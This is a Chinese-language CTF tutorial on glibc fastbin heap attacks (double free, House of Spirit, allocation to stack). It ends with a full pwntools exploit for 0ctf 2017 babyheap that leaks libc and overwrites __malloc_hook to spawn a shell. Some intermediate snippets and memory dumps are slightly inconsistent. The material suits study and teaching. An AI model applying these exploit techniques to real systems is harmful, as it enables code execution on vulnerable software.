堆溢出-Fastbin Attack

原理

利用的前提是：

存在堆溢出、use-after-free 等能控制 chunk 内容的漏洞
漏洞发生于 fastbin 类型的 chunk 中

fastbin使用单链表维护释放的堆块，由 fastbin 管理的 chunk 即使被释放，其 next_chunk 的 prev_inuse 位也不会被清空。

int main(void)
{
    void *chunk1,*chunk2,*chunk3;
    chunk1=malloc(0x30);
    chunk2=malloc(0x30);
    chunk3=malloc(0x30);
    //进行释放
    free(chunk1);
    free(chunk2);
    free(chunk3);
    return 0;
}


///////释放前
0x602000:   0x0000000000000000  0x0000000000000041 <=== chunk1
0x602010:   0x0000000000000000  0x0000000000000000
0x602020:   0x0000000000000000  0x0000000000000000
0x602030:   0x0000000000000000  0x0000000000000000
0x602040:   0x0000000000000000  0x0000000000000041 <=== chunk2
0x602050:   0x0000000000000000  0x0000000000000000
0x602060:   0x0000000000000000  0x0000000000000000
0x602070:   0x0000000000000000  0x0000000000000000
0x602080:   0x0000000000000000  0x0000000000000041 <=== chunk3
0x602090:   0x0000000000000000  0x0000000000000000
0x6020a0:   0x0000000000000000  0x0000000000000000
0x6020b0:   0x0000000000000000  0x0000000000000000
0x6020c0:   0x0000000000000000  0x0000000000020f41 <=== top chunk
    

///////释放后
0x602000:   0x0000000000000000  0x0000000000000041 <=== chunk1
0x602010:   0x0000000000000000  0x0000000000000000 ----------------->0x000000
0x602020:   0x0000000000000000  0x0000000000000000
0x602030:   0x0000000000000000  0x0000000000000000
0x602040:   0x0000000000000000  0x0000000000000041 <=== chunk2
0x602050:   0x0000000000602000  0x0000000000000000 ----------------->0x602000
0x602060:   0x0000000000000000  0x0000000000000000
0x602070:   0x0000000000000000  0x0000000000000000
0x602080:   0x0000000000000000  0x0000000000000041 <=== chunk3
0x602090:   0x0000000000602040  0x0000000000000000 ----------------->0x602040
0x6020a0:   0x0000000000000000  0x0000000000000000
0x6020b0:   0x0000000000000000  0x0000000000000000
0x6020c0:   0x0000000000000000  0x0000000000020f41 <=== top chunk    
    
/////////chunk 3、2、1 构成了一个单链表
Fastbins[idx=2, size=0x30,ptr=0x602080]
===>Chunk(fd=0x602040, size=0x40, flags=PREV_INUSE)
===>Chunk(fd=0x602000, size=0x40, flags=PREV_INUSE)
===>Chunk(fd=0x000000, size=0x40, flags=PREV_INUSE)

Fastbin Double Free

多次分配可以从 fastbin 链表中取出同一个堆块，相当于多个指针指向同一个堆块，结合堆块的数据内容可以实现类似于类型混淆 (type confused) 的效果。

Fastbin Double Free 成功利用的条件：

fastbin 的堆块被释放后 next_chunk 的 pre_inuse 位不会被清空
fastbin 在执行 free 的时候仅验证了 main_arena 直接指向的块，即链表指针头部的块。对于链表后面的块，并没有进行验证。

如果按顺序malloc了chunk0,chunk1，然后连续两次free(chunk0)则会被_int_free检测到从而导致“已放弃 (核心已转储)”，如果在 chunk0释放后，再释放 chunk1，这样 main_arena 就指向 chunk1 而不是 chunk0 了，此时再去释放 chunk0 就不再会被检测到。

int main(void)
{
    void *chunk0,*chunk1;
    chunk0=malloc(0x10);
    chunk1=malloc(0x10);

    free(chunk0);
    free(chunk1);
    free(chunk0);
    return 0;
}


+------------+
| fastbinY[i]|
+-----+------+
      |
      v
+-----+------+
|   chunk0   +<-----+
+-----+------+      |
      |             |
      v             |
+-----+------+      |
|   chunk1   +------+
+------------+

Code

// 再进行一次 malloc() 分配到 chunk0，修改其 fd 指针
//伪造一个 fake chunk，
//往 chunk0 的数据段中写入 fake chunk 的地址，
//就可以将 chunk0 的 fd 指向 fake chunk，
//即将 fake chunk 添加进了 fastbin 链表中。


       +------------+
+------+ fastbinY[i]|
|      +------------+       +-------------+
|                           |             |
|            +------------->+  fake chunk |
|            |              |             |
|      +-----+------+       +-------------+
|      |   chunk0   +<-----+
|      +------------+      |
|                          |
|      +------------+      |
+----->+   chunk1   +------+
       +------------+

Code

//再进行两次malloc()，
//依次分配到 chunk1 和 chunk0，

	   +------------+
+------+ fastbinY[i]|
|      +------------+       +-------------+
|                           |             |
|            +------------->+  fake chunk |
|            |              |             |
|      +-----+------+       +-------------+
+----->+   chunk0   |
       +------------+

       +------------+
       |   chunk1   |
       |  allocated |
       +------------+

Code

//由于之前将 chunk0 的 fd 指针指向了 fake chunk，
//并且 chunk0 还呆在 fastbin 里，
//所以第三次 malloc()时，
//malloc()会将 chunk0 的 fd 赋给 fastbinY[i]，
//此时只要再进行一次malloc()就可以分配到 fake chunk 了。

+------------+
|            |
| fastbinY[i]|
|            |
+-----+------+       +-------------+
      |              |             |
      +------------->+  fake chunk |
                     |             |
+------------+       +-------------+
|            |
|   chunk0   |
|  allocated |
+------------+



+------------+
|            |
|   chunk1   |
|  allocated |
+------------+

House Of Spirit

the Malloc Maleficarum 中的一种技术。

主要意思是我们想要控制的区域控制不了，但它前面和后面都可以控制，所以伪造好数据将它释放到fastbin里面，后面将该内存区域当做堆块申请出来，致使该区域被当做普通的内存使用，从而目标区域就变成了可控的了。

核心在于在目标位置处伪造 fastbin chunk，并将其释放，从而达到分配指定地址的 chunk 的目的。

需要绕过的检测:

fake chunk 的 ISMMAP 位不能为 1，因为 free 时，如果是 mmap 的 chunk，会单独处理。
fake chunk 地址需要对齐， MALLOC_ALIGN_MASK
fake chunk 的 size 大小需要满足对应的 fastbin 的需求，同时也得对齐。
fake chunk 的 next chunk 的大小不能小于 2*SIZE_SZ，同时也不能大于av->system_mem 。
fake chunk 对应的 fastbin 链表头部不能是该 fake chunk，即不能构成 double free 的情况。

想要使用该技术分配 chunk 到指定地址，其实并不需要修改指定地址的任何内容，关键是要能够修改指定地址的前后的内容使其可以绕过对应的检测。

#include <stdio.h>
#include <stdlib.h>

int main()
{
    fprintf(stderr, "This file demonstrates the house of spirit attack.\n");

    fprintf(stderr, "Calling malloc() once so that it sets up its memory.\n");
    malloc(1);

    fprintf(stderr, "We will now overwrite a pointer to point to a fake 'fastbin' region.\n");
    unsigned long long *a;
    // This has nothing to do with fastbinsY (do not be fooled by the 10) - fake_chunks is just a piece of memory to fulfil allocations (pointed to from fastbinsY)
    unsigned long long fake_chunks[10] __attribute__ ((aligned (16)));

    fprintf(stderr, "This region (memory of length: %lu) contains two chunks. The first starts at %p and the second at %p.\n", sizeof(fake_chunks), &fake_chunks[1], &fake_chunks[7]);

    fprintf(stderr, "This chunk.size of this region has to be 16 more than the region (to accomodate the chunk data) while still falling into the fastbin category (<= 128 on x64). The PREV_INUSE (lsb) bit is ignored by free for fastbin-sized chunks, however the IS_MMAPPED (second lsb) and NON_MAIN_ARENA (third lsb) bits cause problems.\n");
    fprintf(stderr, "... note that this has to be the size of the next malloc request rounded to the internal size used by the malloc implementation. E.g. on x64, 0x30-0x38 will all be rounded to 0x40, so they would work for the malloc parameter at the end. \n");
    fake_chunks[1] = 0x40; // this is the size

    fprintf(stderr, "The chunk.size of the *next* fake region has to be sane. That is > 2*SIZE_SZ (> 16 on x64) && < av->system_mem (< 128kb by default for the main arena) to pass the nextsize integrity checks. No need for fastbin size.\n");
        // fake_chunks[9] because 0x40 / sizeof(unsigned long long) = 8
    fake_chunks[9] = 0x1234; // nextsize

    fprintf(stderr, "Now we will overwrite our pointer with the address of the fake region inside the fake first chunk, %p.\n", &fake_chunks[1]);
    fprintf(stderr, "... note that the memory address of the *region* associated with this chunk must be 16-byte aligned.\n");
    a = &fake_chunks[2];

    fprintf(stderr, "Freeing the overwritten pointer.\n");
    free(a);

    fprintf(stderr, "Now the next malloc will return the region of our fake chunk at %p, which will be %p!\n", &fake_chunks[1], &fake_chunks[2]);
    fprintf(stderr, "malloc(0x30): %p\n", malloc(0x30));
}

Code

➜  how2heap git:(master) ./house_of_spirit
This file demonstrates the house of spirit attack.
Calling malloc() once so that it sets up its memory.
We will now overwrite a pointer to point to a fake 'fastbin' region.
This region (memory of length: 80) contains two chunks. The first starts at 0x7ffd9bceaa58 and the second at 0x7ffd9bceaa88.
This chunk.size of this region has to be 16 more than the region (to accomodate the chunk data) while still falling into the fastbin category (<= 128 on x64). The PREV_INUSE (lsb) bit is ignored by free for fastbin-sized chunks, however the IS_MMAPPED (second lsb) and NON_MAIN_ARENA (third lsb) bits cause problems.
... note that this has to be the size of the next malloc request rounded to the internal size used by the malloc implementation. E.g. on x64, 0x30-0x38 will all be rounded to 0x40, so they would work for the malloc parameter at the end.
The chunk.size of the *next* fake region has to be sane. That is > 2*SIZE_SZ (> 16 on x64) && < av->system_mem (< 128kb by default for the main arena) to pass the nextsize integrity checks. No need for fastbin size.
Now we will overwrite our pointer with the address of the fake region inside the fake first chunk, 0x7ffd9bceaa58.
... note that the memory address of the *region* associated with this chunk must be 16-byte aligned.
Freeing the overwritten pointer.
Now the next malloc will return the region of our fake chunk at 0x7ffd9bceaa58, which will be 0x7ffd9bceaa60!
malloc(0x30): 0x7ffd9bceaa60

Alloc to Stack

核心点在于劫持 fastbin 链表中 chunk 的 fd 指针，把 fd 指针指向我们想要分配的栈上，从而实现控制栈中的一些关键数据，比如返回地址等。

通过该技术可以把 fastbin chunk 分配到栈中，从而控制返回地址等关键数据。要实现这一点需要劫持 fastbin 中 chunk 的 fd 域，把它指到栈上，当然同时需要栈上存在有满足条件的 size 值。

typedef struct _chunk
{
    long long pre_size;
    long long size;
    long long fd;
    long long bk;
} CHUNK,*PCHUNK;

int main(void)
{
    CHUNK stack_chunk;

    void *chunk1;
    void *chunk_a;

    stack_chunk.size=0x21;
    chunk1=malloc(0x10);

    free(chunk1);

    *(long long *)chunk1=&stack_chunk;
    malloc(0x10);
    chunk_a=malloc(0x10);
    return 0;
}

Arbitrary Alloc

与 Alloc to stack 是完全相同的，只要满足目标地址存在合法的 size 域，就可以把 chunk 分配到任意的可写内存中，比如 bss、heap、data、stack 等等。

例 2017 0ctf babyheap

功能

  puts("1. Allocate");
  puts("2. Fill");
  puts("3. Free");
  puts("4. Dump");
  puts("5. Exit");
  return printf("Command: ");

/*
    Arch:     amd64-64-little
    RELRO:    Full RELRO
    Stack:    Canary found
    NX:       NX enabled
    PIE:      PIE enabled
*/

漏洞点

__int64 __fastcall Fill(__int64 a1)
{
  __int64 result; // rax
  int v2; // [rsp+18h] [rbp-8h]
  int v3; // [rsp+1Ch] [rbp-4h]

  printf("Index: ");
  result = Read();
  v2 = result;
  if ( result >= 0 && result <= 15 )
  {
    result = *(24LL * result + a1);
    if ( result == 1 )
    {
      printf("Size: ");
      result = Read();
      v3 = result;
      if ( result > 0 )
      {
        printf("Content: ");
        result = sub_11B2(*(24LL * v2 + a1 + 16), v3);   /////可读取任意长度
      }
    }
  }
  return result;
}

利用

基本利用思路

利用 unsorted bin 地址泄漏 libc 基地址。
利用 fastbin attack 将 chunk 分配到 malloc_hook 附近。

leak libc基地址

构造一个 small bin chunk。在将该 chunk 释放到 unsorted bin 的同时，也需要让另外一个正在使用的 chunk 可以同时指向该 chunk 的位置才可以进行泄漏。

python

# 1. leak libc base
allocate(0x10)  # idx 0, 0x00
allocate(0x10)  # idx 1, 0x20
allocate(0x10)  # idx 2, 0x40
allocate(0x10)  # idx 3, 0x60
allocate(0x80)  # idx 4, 0x80
# free idx 1, 2, fastbin[0]->idx1->idx2->NULL
free(1)
free(2)

Code

堆当前布局
pwndbg> x/20xg 0x560ce09d8290
0x560ce09d8290:	0x0000000000000000	0x0000000000000021 ====> chunk0
0x560ce09d82a0:	0x0000000000000000	0x0000000000000000
0x560ce09d82b0:	0x0000000000000000	0x0000000000000021 ====> chunk1(free)
0x559499e682c0:	0x0000000000000000	0x0000559499e68010
0x560ce09d82d0:	0x0000000000000000	0x0000000000000021 ====> chunk2(free)
0x559499e682e0:	0x0000559499e682c0	0x0000559499e68010
0x560ce09d82f0:	0x0000000000000000	0x0000000000000021 ====> chunk3
0x560ce09d8300:	0x0000000000000000	0x0000000000000000
0x560ce09d8310:	0x0000000000000000	0x0000000000000091 ====> chunk4
0x560ce09d8320:	0x0000000000000000	0x0000000000000000

此时使用 fill 覆盖 fastbin 头部 chunk 的 fd 值，将其改写成 small chunk 的地址，那么通过两次 alloc，先将 small chunk 放入 fastbin，再将其取出来，获得指向它的 index。要这么做必须绕过 malloc 的安全检查。

chunksize 的计算方法是 victim->size & ~(SIZE_BITS))，而对应的 index 计算方法为 (size) >> (SIZE_SZ == 8 ? 4 : 3) - 2，这里 64位的平台对应的 SIZE_SZ 是8，则 fastbin_index 为 (size >> 4) - 2，那么我们将 small chunk 的 size 域改写成 0x21 即可。

python

payload = p64(0)*3
payload += p64(0x21)
payload += p64(0)*3
payload += p64(0x21)
payload += p8(0x80)
fill(0, payload)
 
payload = p64(0)*3
payload += p64(0x21)
fill(3, payload)
 
alloc(0x10)
alloc(0x10)

Code

pwndbg> x/20xg 0x55db5f3d4290
0x55db5f3d4290:	0x0000000000000000	0x0000000000000021
0x55db5f3d42a0:	0x0000000000000000	0x0000000000000000
0x55db5f3d42b0:	0x0000000000000000	0x0000000000000021
0x55db5f3d42c0:	0x0000000000000000	0x0000000000000000
0x55db5f3d42d0:	0x0000000000000000	0x0000000000000021
0x55db5f3d42e0:	0x000055db5f3d4280	0x000055db5f3d4010 --+ chunk2
0x55db5f3d42f0:	0x0000000000000000	0x0000000000000021   |
0x55db5f3d4300:	0x0000000000000000	0x0000000000000000   |
0x55db5f3d4310:	0x0000000000000000	0x0000000000000021 <-+ chunk4
0x55db5f3d4320:	0x0000000000000000	0x0000000000000000

可以看到 index[2] 存放的是 small chunk 的地址，此时将 small chunk 的 size 改写回来，将其释放掉就可以 dump 出来了。

python

payload = p64(0)*3 + p64(0x91)
fill(3, payload)
alloc(0x80)
free(4)

def offset_bin_main_arena(idx):
    word_bytes = context.word_size / 8
    offset = 4  # lock
    offset += 4  # flags
    offset += word_bytes * 10  # offset fastbin
    offset += word_bytes * 2  # top,last_remainder
    offset += idx * 2 * word_bytes  # idx
    offset -= word_bytes * 2  # bin overlap
    return offset

dump(2)
p.recvuntil('Content: ')
unsortedbin_addr = u64(p.recv(8))
main_arena = unsortedbin_addr - offset_unsortedbin_main_arena
log.success('main arena addr: ' + hex(main_arena))
main_arena_offset = 0x3c4b20
libc_base = main_arena - main_arena_offset
log.success('libc base addr: ' + hex(libc_base))

main_arena_offset脚本 https://github.com/bash-c/main_arena_offset

Code

$ bash main_arena ./x64_libc.so.6 
[+]libc version : glibc 2.23
[+]build ID : BuildID[sha1]=b5381a457906d279073822a5ceb24c4bfef94ddb
[+]main_arena_offset : 0x3c4b20

分配 chunk 到 malloc_hook 附近

由于 malloc hook 附近的 chunk 大小为 0x7f，所以数据区域为 0x60。这里我们再次申请的时候，对应 fastbin 链表中没有相应大小 chunk，所以根据堆分配器规则，它会依次处理 unsorted bin 中的 chunk，将其放入到对应的 bin 中，之后会再次尝试分配 chunk，因为之前释放的 chunk 比当前申请的 chunk 大，所以可以从其前面分割出来一块。所以 idx2 仍然指向该位置，那么我们可以使用类似的办法先释放申请到的 chunk，然后再次修改 fd 指针为 fake chunk 即可。此后我们修改 malloc_hook 处的指针即可得到触发 onegadget。

Code

pwndbg> x/32xw (long long)(&main_arena)-0x40
0x7fa8a92a6b40 <_IO_wide_data_0+224>:	0x00000000	0x00000000	0x00000000	0x00000000
0x7fa8a92a6b50 <_IO_wide_data_0+240>:	0xa92a7f60	0x00007fa8	0x00000000	0x00000000
0x7fa8a92a6b60 <__memalign_hook>:	0xa91595a0	0x00007fa8	0xa9159c20	0x00007fa8
0x7fa8a92a6b70 <__malloc_hook>:	0x00000000	0x00000000	0x00000000	0x00000000
0x7fa8a92a6b80 <main_arena>:	0x00000000	0x00000000	0x00000000	0x00000000
0x7fa8a92a6b90 <main_arena+16>:	0x00000000	0x00000000	0x00000000	0x00000000
0x7fa8a92a6ba0 <main_arena+32>:	0x00000000	0x00000000	0x00000000	0x00000000
0x7fa8a92a6bb0 <main_arena+48>:	0x00000000	0x00000000	0x00000000	0x00000000

python

allocate(0x60)
free(4)
# edit idx4's fd point to fake chunk
fake_chunk_addr = main_arena - 0x33
fake_chunk = p64(fake_chunk_addr)
fill(2, len(fake_chunk), fake_chunk)

allocate(0x60)  # idx 4
allocate(0x60)  # idx 6

one_gadget_addr = libc_base + 0x4526a
payload = 0x13 * 'a' + p64(one_gadget_addr)
fill(6, payload)
# trigger malloc_hook
allocate(0x100)
p.interactive()

exp

python

from pwn import *
context.log_level = "debug"
p=process('./babyheap_0ctf_2017')

def allocate(size):
    p.recvuntil('Command: ')
    p.sendline('1')
    p.sendline(str(size))

def fill(idx,payload):
    p.recvuntil('Command: ')
    p.sendline('2')
    p.sendline(str(idx))
    p.sendline(str(len(payload)))
    p.send(payload)

def free(idx):
    p.recvuntil('Command: ')
    p.sendline('3')
    p.sendline(str(idx))

def dump(idx):
    p.recvuntil('Command: ')
    p.sendline('4')
    p.recvuntil('Index: ')
    p.sendline(str(idx))

# 1. leak libc base
allocate(0x10)  # idx 0, 0x00
allocate(0x10)  # idx 1, 0x20
allocate(0x10)  # idx 2, 0x40
allocate(0x10)  # idx 3, 0x60
allocate(0x80)  # idx 4, 0x80
# free idx 1, 2, fastbin[0]->idx1->idx2->NULL
free(1)
free(2)

payload = p64(0)*3
payload += p64(0x21)
payload += p64(0)*3
payload += p64(0x21)
payload += p8(0x80)
fill(0, payload)

payload = p64(0)*3
payload += p64(0x21)
fill(3, payload)

allocate(0x10)
allocate(0x10)

payload = p64(0)*3 + p64(0x91)
fill(3, payload)
allocate(0x80)
free(4)

def offset_bin_main_arena(idx):
    word_bytes = context.word_size / 8
    offset = 4  # lock
    offset += 4  # flags
    offset += word_bytes * 10  # offset fastbin
    offset += word_bytes * 2  # top,last_remainder
    offset += idx * 2 * word_bytes  # idx
    offset -= word_bytes * 2  # bin overlap
    return offset

dump(2)
p.recvuntil('Content: ')
unsortedbin_addr = u64(p.recv(8))
log.success(unsortedbin_addr)
main_arena = unsortedbin_addr - offset_bin_main_arena(2)
log.success('main arena addr: ' + hex(main_arena))
main_arena_offset = 0x3c4b20
libc_base = main_arena - main_arena_offset
log.success('libc base addr: ' + hex(libc_base))

allocate(0x60)
free(4)
# edit idx4's fd point to fake chunk
fake_chunk_addr = main_arena - 0x33
log.success(hex(fake_chunk_addr))
fake_chunk = p64(fake_chunk_addr)
fill(2,  fake_chunk)

allocate(0x60)  # idx 4
allocate(0x60)  # idx 6

one_gadget_addr = libc_base + 0x4526a
payload = 0x13 * 'a' + p64(one_gadget_addr)
fill(6,  payload)
# trigger malloc_hook
allocate(0x100)
p.interactive()